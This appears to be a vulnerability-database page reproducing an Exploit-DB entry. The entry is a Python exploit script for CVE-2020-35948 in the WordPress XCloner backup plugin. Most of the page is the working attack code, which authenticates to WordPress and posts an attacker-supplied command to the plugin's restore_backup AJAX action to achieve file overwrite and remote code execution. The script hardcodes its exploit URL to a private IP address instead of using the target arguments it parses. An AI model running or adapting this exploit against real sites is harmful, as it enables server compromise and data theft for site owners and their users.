Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)

🗓️ 01 Jul 2021 00:00:00Reported by Ron JostType

exploitdb🔗 www.exploit-db.com👁 662 Views

Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated). Vulnerable version: 4.2.1 - 4.2.12, CVE-2020-3594

Reporter	Title	Published	Views	Family All 14
0day.today	Wordpress XCloner 4.2.12 Plugin - Remote Code Execution (Authenticated) Exploit	1 Jul 202100:00	–	zdt
Circl	CVE-2020-35948	1 Jan 202107:32	–	circl
CNNVD	WordPress XCloner Backup and Restore plugin security vulnerability	31 Dec 202000:00	–	cnnvd
Check Point Advisories	WordPress XCloner Backup Plugin Remote Code Execution (CVE-2020-35948)	31 Oct 202100:00	–	checkpoint_advisories
CVE	CVE-2020-35948	1 Jan 202103:27	–	cve
Cvelist	CVE-2020-35948	1 Jan 202103:27	–	cvelist
NVD	CVE-2020-35948	1 Jan 202104:15	–	nvd
OSV	CVE-2020-35948	1 Jan 202104:15	–	osv
Packet Storm	WordPress XCloner 4.2.12 Remote Code Execution	1 Jul 202100:00	–	packetstorm
Patchstack	WordPress Backup, Restore and Migrate plugin 4.2.1 – 4.2.12 - Unprotected AJAX Action to Arbitrary File Overwrite and Sensitive Information Disclosure vulnerability	22 Sep 202000:00	–	patchstack

# Exploit Title: Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)
# Date 30.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.xcloner.com/
# Software Link: https://downloads.wordpress.org/plugin/xcloner-backup-and-restore.4.2.12.zip
# Version: 4.2.1 - 4.2.12
# Tested on: Ubuntu 18.04
# CVE: CVE-2020-35948
# CWE: CWE-732
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2020-35948-Exploit/README.md

'''
Description:
An issue was discovered in the XCloner Backup and Restore plugin before 4.2.13 for WordPress. It gave authenticated attackers the ability to modify arbitrary files, 
including PHP files. Doing so would allow an attacker to achieve remote code execution. The xcloner_restore.php write_file_action could overwrite wp-config.php, 
for example. Alternatively, an attacker could create an exploit chain to obtain a database dump.
'''


'''
Banner:
'''
banner = """


  #####  #     # #######        #####    ###    #####    ###          #####  #######  #####  #        #####  
 #     # #     # #             #     #  #   #  #     #  #   #        #     # #       #     # #    #  #     # 
 #       #     # #                   # #     #       # #     #             # #       #     # #    #  #     # 
 #       #     # #####   #####  #####  #     #  #####  #     # #####  #####  ######   ###### #    #   #####  
 #        #   #  #             #       #     # #       #     #             #       #       # ####### #     # 
 #     #   # #   #             #        #   #  #        #   #        #     # #     # #     #      #  #     # 
  #####     #    #######       #######   ###   #######   ###          #####   #####   #####       #   #####  
                                                                                                             
                                                                                                             
                                                                
                                                                by @Hacker5preme
"""
print(banner)


'''
Import required modules:
'''
import requests
import argparse


'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin XCloner RCE (Authenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('')
ajax_cmd = input('[*] Ajax Command to execute: ')

'''
Authentication:
'''
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'

# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log':  username, 
    'pwd': password, 
    'wp-submit': 'Log In', 
    'testcookie': '1'
}

# Authenticate:
print('')
auth = session.post(auth_url, headers=header, data=body)
auth_header= auth.headers['Set-Cookie']
if 'wordpress_logged_in' in auth_header:
    print('[+] Authentication successfull !')
else:
    print('[-] Authentication failed !')
    exit()


'''
Exploit:
'''
url_exploit = "http://192.168.0.38:80/wordpress//wp-admin/admin-ajax.php?action=restore_backup"

header = {
    "Accept": "*/*",
    "Content-Type": "multipart/form-data; boundary=------------------------08425016980d7357",
    "Connection": "close"
}

# Body:
body = "--------------------------08425016980d7357\r\nContent-Disposition: form-data; name=\"xcloner_action\"\r\n\r\n%s\r\n--------------------------08425016980d7357--\r\n" % (ajax_cmd)

exploit = session.post(url_exploit, headers=header, data=body)
print('')
print(exploit.text)
print('')

01 Jul 2021 00:00Current

9High risk

Vulners AI Score9

CVSS 26.5

CVSS 3.18.8 - 9.9

EPSS0.49409